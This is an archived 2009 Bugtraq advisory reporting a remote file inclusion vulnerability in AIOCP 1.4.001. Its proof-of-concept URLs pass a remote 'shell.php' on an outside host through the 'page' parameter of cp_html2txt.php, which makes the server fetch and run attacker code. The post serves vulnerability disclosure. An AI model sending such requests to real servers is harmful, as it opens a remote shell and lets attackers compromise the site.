lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20090727055837.32289.qmail@securityfocus.com> Date: 27 Jul 2009 05:58:37 -0000 From: hadikiamarsi@...mail.com To: bugtraq@...urityfocus.com Subject: Remote File Inclusion in aiocp ########################################### # # Aiocp 1.4.001 Remote File Inclusion vulnerability # # Found by : Hadi Kiamarsi # # Contact : hadikiamarsi [at] hotmail.com # # Download : http://sourceforge.net/projects/aiocp/files/aiocp/AIOCP%201.4.001/aiocp_1_4_001.zip/download # ########################################### PoC : http://[target]/[path]/public/code/cp_html2txt.php?page=[SHELL] example : http://localhost/root/public/code/cp_html2txt.php?page=http://www.example.com/shell.php local Example : http://localhost/root/public/code/cp_html2txt.php?page=http://localhost/shell.php